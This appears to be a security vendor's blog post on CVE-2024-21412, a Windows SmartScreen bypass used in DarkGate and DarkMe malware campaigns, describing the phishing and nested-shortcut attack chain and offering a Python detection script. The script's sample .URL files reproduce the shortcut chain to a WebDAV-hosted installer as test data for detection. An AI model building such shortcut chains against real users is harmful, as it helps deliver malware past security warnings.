SOCRadar® Cyber Intelligence Inc. | Windows SmartScreen Vulnerability Exploited in DarkGate Malware Attacks, Patch CVE-2024-21412 Now


Mar 14, 2024
4 Mins Read

Windows SmartScreen Vulnerability Exploited in DarkGate Malware Attacks, Patch CVE-2024-21412 Now

In January 2024, a new DarkGate malware campaign was discovered that exploited a then-unpatched (zero-day) Windows Defender SmartScreen vulnerability to suppress security warnings and deliver fake software installers.

The vulnerability in question is CVE-2024-21412, which recently received a patch during Microsoft’s February 2024 Patch Tuesday.

How Do Attackers Exploit the Windows Defender SmartScreen Vulnerability, CVE-2024-21412?

SmartScreen is a Windows Defender security feature that warns users before they open downloaded files (those carrying the Mark of the Web) that it cannot vouch for or that it flags as malicious.

CVE-2024-21412 (CVSS 8.1) is classified as a Security Feature Bypass. A specially crafted file lets an attacker suppress the SmartScreen warning that would normally appear, so a victim who opens it launches the payload without any prompt. Exploitation still requires the victim to open the malicious file, which is why the campaigns described below pair it with phishing.

Vulnerability card of CVE-2024-21412 (SOCRadar Vulnerability Intelligence)

Attackers exploit the vulnerability by creating a Windows Internet Shortcut (.URL) file that points to a second shortcut file hosted on a remote share (an SMB share in the original proof of concept, a WebDAV server in the DarkGate campaign below). When the victim opens the first shortcut, Windows follows the chain and launches the file at the final destination without applying the SmartScreen check, so no warning is shown.

Notably, CVE-2024-21412 is a patch bypass for another SmartScreen vulnerability, CVE-2023-36025 (CVSS 8.8), which Microsoft initially patched in the November 2023 Patch Tuesday.

Threat Actors Targeting CVE-2024-21412 and Details of DarkGate Malware

After Microsoft addressed CVE-2024-21412 in February 2024 Patch Tuesday, researchers revealed that Water Hydra (a.k.a. DarkCasino) had previously exploited it as a zero-day in attacks directed at foreign exchange traders. The exploitation of the vulnerability resulted in the deployment of the DarkMe Remote Access Trojan (RAT) on victims’ systems.

Now, DarkGate malware operators are also leveraging CVE-2024-21412 with the objective of infiltrating their targets while simultaneously disabling security warnings.

DarkGate rose to prominence in mid-2023 as a malware-as-a-service offering, around the same time as PikaBot, and both were used in campaigns that filled the gap left by QakBot's takedown in August 2023. You can find a timeline of these events, including the emergence of DarkGate, in a previous SOCRadar blog post detailing the events and operations of QakBot.

For further information on DarkGate visit our blog post: DarkGate Malware, Exploring Threats and Countermeasures

Explore the details and latest updates on the operation through our Cyber Threat Intelligence module’s Threat Actor/Malware page:

DarkGate Malware, SOCRadar Threat Actors/Malware page

The Attack Chain of DarkGate Malware

Operators initiate the attack with a phishing email carrying a PDF attachment. The links in the PDF abuse open redirects on Google DoubleClick Digital Marketing (DDM) services, so the visible link points at a trusted Google domain and passes email security checks.

If the victim clicks the link, the redirect lands on a compromised web server hosting an Internet Shortcut file (.URL). This first shortcut points to a second shortcut file hosted on an attacker-controlled WebDAV server.

DarkGate Attack Chain (TrendMicro)

Because of CVE-2024-21412, opening the shortcut chain launches a malicious MSI file with no SmartScreen warning. The MSI is disguised as legitimate software such as NVIDIA, Apple iTunes, or Notion. On installation it relies on DLL side-loading: a legitimate, signed executable bundled in the package loads a malicious DLL placed beside it, and that DLL decrypts and launches DarkGate. Once running, DarkGate enables data theft, deployment of additional payloads, keylogging, and real-time remote access for the attackers.

Researchers have also identified that this campaign uses DarkGate version 6.1.7, which introduces an XOR-encrypted configuration, updated Command and Control (C2) values, and new configuration options that help the operators establish persistence and evade analysis sandboxes more effectively.
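The exploit mechanism and the attack chain above both hinge on one artifact: an Internet Shortcut (.URL) whose target is another shortcut or an installer on a remote share. The following triage script, added here as an illustration and not part of the SOCRadar or Trend Micro material, parses .URL files (INI-style, `[InternetShortcut]` section, `URL=` key) and flags that nested-shortcut pattern. The sample files, hostnames (documentation address 192.0.2.10) and paths are constructed placeholders, not indicators from the campaign; it does not check the Mark of the Web, which on a Windows host you would confirm separately via the `Zone.Identifier` alternate data stream.

```python
"""Triage Windows Internet Shortcut (.url) files for the nested-shortcut
pattern used against SmartScreen: a .url whose target is a second shortcut
or an installer on a remote share (UNC path, WebDAV syntax, or file:// with a
host). Samples below are constructed for illustration only."""
import configparser
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional
from urllib.parse import unquote, urlparse

# .url/.lnk targets are the nested-shortcut stage; the rest are payload types.
SHORTCUT_EXT = (".url", ".lnk")
PAYLOAD_EXT = (".msi", ".exe", ".js", ".vbs", ".hta", ".cmd", ".bat")

# \\host\share\..., which also covers WebDAV forms like \\host@80\DavWWWRoot\...
UNC_RE = re.compile(r"^\\\\([^\\]+)\\")


@dataclass
class Finding:
    name: str
    target: Optional[str]
    verdict: str                      # nested-shortcut | remote-payload | remote-file | ok | unparsable
    reasons: List[str] = field(default_factory=list)


def parse_url_file(text: str) -> Optional[str]:
    """Return the URL= value from the [InternetShortcut] section, or None."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        cp.read_string(text)
    except configparser.Error:
        return None
    for section in cp.sections():
        if section.lower() == "internetshortcut":
            value = cp[section].get("url")   # keys are case-folded by configparser
            return value.strip() if value else None
    return None


def remote_host(target: str) -> Optional[str]:
    """Host the target resolves to, or None for ordinary web links and local paths."""
    m = UNC_RE.match(target)
    if m:
        return m.group(1)
    u = urlparse(target)
    if u.scheme.lower() == "file" and u.netloc:
        return u.netloc
    return None


def target_ext(target: str) -> str:
    """Lower-cased extension of the final path component, or '' if none of interest."""
    u = urlparse(target)
    path = u.path if u.scheme.lower() in ("http", "https", "file") else target
    path = unquote(path).rstrip("/\\").lower()
    for ext in SHORTCUT_EXT + PAYLOAD_EXT:
        if path.endswith(ext):
            return ext
    return ""


def triage(name: str, text: str) -> Finding:
    target = parse_url_file(text)
    if target is None:
        return Finding(name, None, "unparsable", ["no [InternetShortcut] URL= entry"])
    host = remote_host(target)
    if host is None:
        return Finding(name, target, "ok", [])
    reasons = [f"target is fetched from remote share {host}"
               + (" (WebDAV syntax)" if "@" in host else "")]
    ext = target_ext(target)
    if ext in SHORTCUT_EXT:
        reasons.append(f"target is another shortcut ({ext}): nested-shortcut SmartScreen bypass pattern")
        return Finding(name, target, "nested-shortcut", reasons)
    if ext in PAYLOAD_EXT:
        reasons.append(f"target is an installer/executable ({ext})")
        return Finding(name, target, "remote-payload", reasons)
    return Finding(name, target, "remote-file", reasons)


def triage_all(samples: Dict[str, str]) -> Dict[str, Finding]:
    return {name: triage(name, text) for name, text in samples.items()}


# Constructed samples: stage1 -> stage2 mirrors the shortcut chain in the text.
SAMPLES = {
    "stage1.url":   "[InternetShortcut]\r\nURL=file://192.0.2.10/share/stage2.url\r\nIconIndex=1\r\n",
    "stage2.url":   "[InternetShortcut]\r\nURL=\\\\192.0.2.10@80\\DavWWWRoot\\update\\Setup.msi\r\n",
    "benign.url":   "[InternetShortcut]\r\nURL=https://www.example.com/\r\n",
    "intranet.url": "[InternetShortcut]\r\nURL=file://fileserver/docs/handbook.pdf\r\n",
}

if __name__ == "__main__":
    for f in triage_all(SAMPLES).values():
        print(f"{f.name:14} {f.verdict:16} {f.target}")
        for r in f.reasons:
            print(f"{'':14} - {r}")
```

Run it over a directory of .URL files pulled from mail attachments or download folders and treat `nested-shortcut` as a high-confidence hit; `remote-file` covers legitimate intranet shortcuts and needs an allow-list of known file servers before it is worth alerting on.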

Harness SOCRadar’s Capabilities to Stay Proactive Against Exploitation

Stay proactive in mitigating the risk of malware attacks and vulnerability exploitation. Monitor your digital assets and stay informed about the evolving vulnerability landscape to stay one step ahead of emerging threats.

SOCRadar’s Vulnerability Intelligence offers comprehensive details on identified vulnerabilities, including the latest updates, available exploits, and vulnerability lifecycles. Moreover, the Attack Surface Management module sends timely alerts for any security issues, including the emergence of vulnerabilities across your assets, facilitating a better patch management strategy.

CVE and exploit trends, SOCRadar’s Vulnerability Intelligence

Indicators of Compromise (IoCs) for the DarkGate Campaign Targeting SmartScreen

An extensive list of Indicators of Compromise (IoCs) related to the DarkGate campaign exploiting the Windows Defender SmartScreen vulnerability, CVE-2024-21412, is available here.